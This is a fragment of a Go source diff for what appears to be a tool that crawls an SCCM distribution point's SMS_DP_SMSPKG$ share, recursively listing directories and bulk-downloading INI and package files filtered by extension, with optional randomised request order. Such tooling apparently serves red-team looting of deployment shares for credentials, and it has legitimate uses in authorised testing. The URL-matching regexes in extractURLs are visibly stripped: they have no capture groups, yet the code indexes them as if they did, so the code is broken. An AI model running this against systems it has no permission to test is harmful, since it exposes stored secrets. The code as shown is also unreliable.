strings.TrimSuffix(filenameWithExt, filepath.Ext(filenameWithExt)) + + outPath := filepath.Join(outputDir, "inis", dirName) + // Ensure the output directory exists for inis + if err := os.MkdirAll(outPath, os.ModePerm); err != nil { + slog.Error(fmt.Sprintf("Error creating base output directory: %v\n", err)) + return + } + + outPathFilesBase := filepath.Join(outputDir, "files") + // Ensure the output directory exists for files + if err := os.MkdirAll(outPathFilesBase, os.ModePerm); err != nil { + slog.Error(fmt.Sprintf("Error creating base output directory: 
%v\n", err)) + return + } + + // Create a wait group to wait for all goroutines to finish + var wg sync.WaitGroup + wg.Add(len(fileNames)) + + // Create a channel to limit the number of concurrent downloads + semaphore := make(chan struct{}, numThreads) + + if randomize { + randomizeStrings(fileNames) + } + + // Iterate over the filenames and download the files + for _, filename := range fileNames { + filename = strings.ReplaceAll(filename, "\\", "/") + if strings.Contains(filename, "/") { + dir := filepath.Dir(filename) + if err := os.MkdirAll(filepath.Join(outPath, dir), os.ModePerm); err != nil { + slog.Error(fmt.Sprintf("Error creating base output directory: %v\n", err)) + return + } + } + + wanted, outPathFiles := fileWanted(allowExtensions, downloadNoExt, filename, outputDir) + if !wanted { + wg.Done() + continue + } + + // Add an empty struct to the semaphore channel to "take up" one slot/thread + semaphore <- struct{}{} + go downloadINIAndFile(outPath, outPathFiles, filename, dirName, &wg, semaphore) + } + wg.Wait() + +} + +// Helper function to check if two slices of bytes are equal +func bytesEqual(a, b []byte) bool { + if len(a) != len(b) { + return false + } + for i := range a { + if a[i] != b[i] { + return false + } + } + return true +} + +func extractFileName(href string) string { + // Split the URL by '/' + parts := strings.Split(href, "/") + // Get the last part of the URL + lastPart := parts[len(parts)-1] + // Remove any leading or trailing spaces + trimmedPart := strings.TrimSpace(lastPart) + return trimmedPart +} + +func randomizeStrings(strings []string) { + // Create a new source for random numbers + source := rand.NewSource(time.Now().UnixNano()) + random := rand.New(source) + + // Randomize the order of the slice using sort.Slice + sort.Slice(strings, func(i, j int) bool { + return random.Intn(2) == 0 + }) +} + +func extractURLs(fileDirectoryURL string) ([]string, []string) { + html, err := getURL(fileDirectoryURL) + if err != nil { + return 
nil, nil + } + + var fileURLs []string + var dirURLs []string + + // Regular expression pattern to match URLs + urlPattern := `\d+ ` + + // Regular expression pattern to match directory URLs + dirPattern := `<dir> ` + + // Find all URLs + urls := regexp.MustCompile(urlPattern).FindAllStringSubmatch(html, -1) + for _, url := range urls { + fileURLs = append(fileURLs, url[1]) + } + + // Find all directory URLs + doubleDirURLs := regexp.MustCompile(dirPattern).FindAllStringSubmatch(html, -1) + for _, url := range doubleDirURLs { + dirURLs = append(dirURLs, url[1]) + } + + return fileURLs, dirURLs +} + +func getAllFileURLsFromDirNames(dataLibFiles []string, numThreads int, randomize bool) []string { + + bar := progressbar.NewOptions(-1, + progressbar.OptionSetWriter(ansi.NewAnsiStdout()), + progressbar.OptionEnableColorCodes(true), + progressbar.OptionShowBytes(false), + progressbar.OptionShowCount(), + progressbar.OptionShowElapsedTimeOnFinish(), + progressbar.OptionSetWidth(30), + progressbar.OptionSetDescription("[cyan][1/2][reset] Getting file URLs"), + progressbar.OptionSetTheme(progressbar.Theme{ + Saucer: "[green]=[reset]", + SaucerHead: "[green]>[reset]", + SaucerPadding: " ", + BarStart: "[", + BarEnd: "]", + })) + + // Create a wait group to wait for all goroutines to finish + var wg sync.WaitGroup + wg.Add(len(dataLibFiles)) + // Create a mutex for file appending + mu := &sync.Mutex{} + + // Create a channel to limit the number of concurrent downloads + semaphore := make(chan struct{}, numThreads) + + if randomize { + randomizeStrings(dataLibFiles) + } + + for _, dataLibFile := range dataLibFiles { + // Skip INI files + if strings.HasSuffix(dataLibFile, ".INI") { + wg.Done() + continue + } + var fileDirectoryURL string + if !strings.Contains(dataLibFile, "http") { + fileDirectoryURL = fmt.Sprintf("%s/SMS_DP_SMSPKG$/%s", urlBase, dataLibFile) + } else { + fileDirectoryURL = dataLibFile + } + + // Add an empty struct to the semaphore channel to "take up" one 
slot/thread + semaphore <- struct{}{} + go getFilesFromDirNames(fileDirectoryURL, bar, &wg, semaphore, mu) + + } + wg.Wait() + bar.Finish() + return allFileURLs + +} + +func getFilesFromDirNames(fileDirectoryURL string, bar *progressbar.ProgressBar, wg *sync.WaitGroup, semaphore chan struct{}, mu *sync.Mutex) { + + fileURLs, dirURLs := extractURLs(fileDirectoryURL) + bar.Add(len(fileURLs)) + + mu.Lock() + allFileURLs = append(allFileURLs, fileURLs...) + mu.Unlock() + // Read one struct from the semaphore channel to "let go" of one slot/thread + <-semaphore + + if len(dirURLs) > 0 { + slog.Debug(fmt.Sprintf("Found %d directories in %s", len(dirURLs), fileDirectoryURL)) + for _, dirURL := range dirURLs { + wg.Add(1) + // Add an empty struct to the semaphore channel to "take up" one slot/thread + semaphore <- struct{}{} + getFilesFromDirNames(dirURL, bar, wg, semaphore, mu) + } + } + + // If we "Done()" before the Add it the wg could hit zero and then an Add could run and panic the Wait() + wg.Done() +} + +func fileWanted(allowExtensions []string, downloadNoExt bool, filename string, outputDir string) (bool, string) { + var outPathFiles string + fileSuffix := filepath.Ext(filename) + // Remove the leading dot (.) 
from the file suffix + if len(fileSuffix) > 1 { + fileSuffix = fileSuffix[1:] + if allowExtensions != nil && !slices.Contains(allowExtensions, "all") && !slices.Contains(allowExtensions, fileSuffix) { + slog.Debug(fmt.Sprintf("Skipping %s: %s not wanted", filename, fileSuffix)) + return false, "" + } + outPathFiles = filepath.Join(outputDir, "files", fileSuffix) + // Ensure the output directory exists for files + if err := os.MkdirAll(outPathFiles, os.ModePerm); err != nil { + slog.Error(fmt.Sprintf("Error creating file type output directory: %v\n", err)) + return false, "" + } + } else { + if downloadNoExt { + slog.Debug(fmt.Sprintf("File %s has no file extension, downloading it!", filename)) + outPathFiles = filepath.Join(outputDir, "files", "UKN") + // Ensure the output directory exists for files + if err := os.MkdirAll(outPathFiles, os.ModePerm); err != nil { + slog.Error(fmt.Sprintf("Error creating file type output directory: %v\n", err)) + return false, "" + } + } else { + slog.Debug(fmt.Sprintf("File %s has no file extension, and files without extensions are not being kept, skipping", filename)) + return false, "" + } + } + return true, outPathFiles +}